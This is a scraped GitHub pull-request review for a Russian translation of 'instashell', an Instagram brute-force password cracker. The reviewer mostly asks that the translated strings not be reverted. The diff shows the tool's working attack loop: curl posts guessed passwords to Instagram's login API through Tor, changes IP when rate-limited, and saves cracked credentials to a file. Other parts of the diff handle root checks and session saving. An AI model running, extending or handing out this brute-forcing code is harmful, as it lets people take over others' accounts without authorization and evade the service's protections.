Conversation
XIshArkIX
left a comment
There was a problem hiding this comment.
Do not change translations as much as possible!
| git clone https://github.com/XIshArkIX/instashell | ||
| ### Usage: | ||
| ``` | ||
| git clone https://github.com/thelinuxchoice/instashell |
There was a problem hiding this comment.
Change to:
| git clone https://github.com/thelinuxchoice/instashell | |
| git clone https://github.com/XIshArkIX/instashell |
| checkroot() { | ||
|
|
||
| if [[ "$(id -u)" -ne 0 ]]; then | ||
| <<<<<<< HEAD |
| checkroot() { | ||
| if [[ "$(id -u)" -ne 0 ]]; then | ||
| printf "\e[1;77mЗапускайте скрипт от имени супер пользователя!\n\e[0m" | ||
| printf "\e[1;77mPlease, run this program as root!\n\e[0m" |
There was a problem hiding this comment.
Do not change translations as much as possible
| command -v cut > /dev/null 2>&1 || { echo >&2 "I require cut but it's not installed. Aborting."; exit 1; } | ||
| command -v uniq > /dev/null 2>&1 || { echo >&2 "I require uniq but it's not installed. Aborting."; exit 1; } | ||
| if [ $(ls /dev/urandom >/dev/null; echo $?) == "1" ]; then | ||
| echo "/dev/urandom not found!" |
There was a problem hiding this comment.
Do not change translations as much as possible (1)
| printf "\e[1;77m |_||_| |_|(___/ \__)\_____|(___/ |_| |_||_____) \_)\_)(_____) \e[0m\n" | ||
| printf "\n" | ||
| printf "\e[1;77m\e[45m Instagram Brute Forcer v1.5.4 Author: thelinuxchoice (Github/IG) \e[0m\n" | ||
| printf "\e[1;77m\e[45m RU by XI_shArky_IX (github.com/XIshArkIX) \e[0m\n" |
| default_session="Y" | ||
| printf "\n\e[1;77mСохранить сессию для пользователя\e[0m\e[1;92m %s \e[0m" $user | ||
| read -p $'\e[1;77m? [Д/н]: \e[0m' session | ||
| printf "\n\e[1;77mSave session for user\e[0m\e[1;92m %s \e[0m" $user |
There was a problem hiding this comment.
Do not change translations as much as possible (7)
| printf "Имя=\"%s\"\nПароль=\"%s\"\nТекущий=\"%s\"\nПопытка=\"%s\"\n" $user $pass $wl_pass $countpass > sessions/store.session.$user.$(date +"%FT%H%M") | ||
| printf "\e[1;77mСессия сохранена.\e[0m\n" | ||
| printf "\e[1;92mИспользуйте ./instashell --resume\n\033[0m" | ||
| printf "user=\"%s\"\npass=\"%s\"\nwl_pass=\"%s\"\ntoken=\"%s\"\n" $user $pass $wl_pass $countpass > sessions/store.session.$user.$(date +"%FT%H%M") |
There was a problem hiding this comment.
Do not change translations as much as possible (8)
| printf "\e[1;92mИмя пользователя:\e[0m\e[1;77m %s\e[0m\n" $user | ||
| printf "\e[1;92mСловарь:\e[0m\e[1;77m %s (%s)\e[0m\n" $wl_pass $count_pass | ||
| printf "\e[1;91m[*] Нажмите Ctrl + C, чтобы остановить или сохранить сессию\n\e[0m" | ||
| printf "\e[1;92mUsername:\e[0m\e[1;77m %s\e[0m\n" $user |
There was a problem hiding this comment.
Do not change translations as much as possible (9)
|
|
||
| let token++ | ||
| printf "\e[1;77mПробую (%s/%s)\e[0m: %s\n" $countpass $count_pass $pass #token | ||
| printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $countpass $count_pass $pass #token |
There was a problem hiding this comment.
Do not change translations as much as possible (10)
| printf "\e[1;77mTrying pass (%s/%s)\e[0m: %s\n" $countpass $count_pass $pass #token | ||
|
|
||
| {(trap '' SIGINT && var=$(curl --socks5-hostname 127.0.0.1:9050 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; ru_RU)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "logged_in_user\|challenge\|many tries\|Please wait"| uniq ); if [[ $var == "challenge" ]]; then printf "\e[1;92m \n [*] Найден пароль: %s\n [*] Запрошено испытание\n" $pass; printf "Имя пользователя: %s, Пароль: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Сохранено:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$ ; elif [[ $var == "logged_in_user" ]]; then printf "\e[1;92m \n [*] Найден пароль: %s\n" $pass; printf "Имя пользователя: %s, Пароль: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Сохранено:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$ ; elif [[ $var == "Please wait" ]]; then changeip; fi; ) } & done; wait $!; | ||
| {(trap '' SIGINT && var=$(curl --socks5-hostname 127.0.0.1:9050 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "logged_in_user\|challenge\|many tries\|Please wait" | uniq ); if [[ $var == "challenge" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n [*] Challenge required\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$ ; elif [[ $var == "logged_in_user" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instashell ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instashell \n\e[0m"; kill -1 $$ ; elif [[ $var == "Please wait" ]]; then changeip; fi; ) } & done; wait $!; |
There was a problem hiding this comment.
Do not change translations as much as possible (11)
No description provided.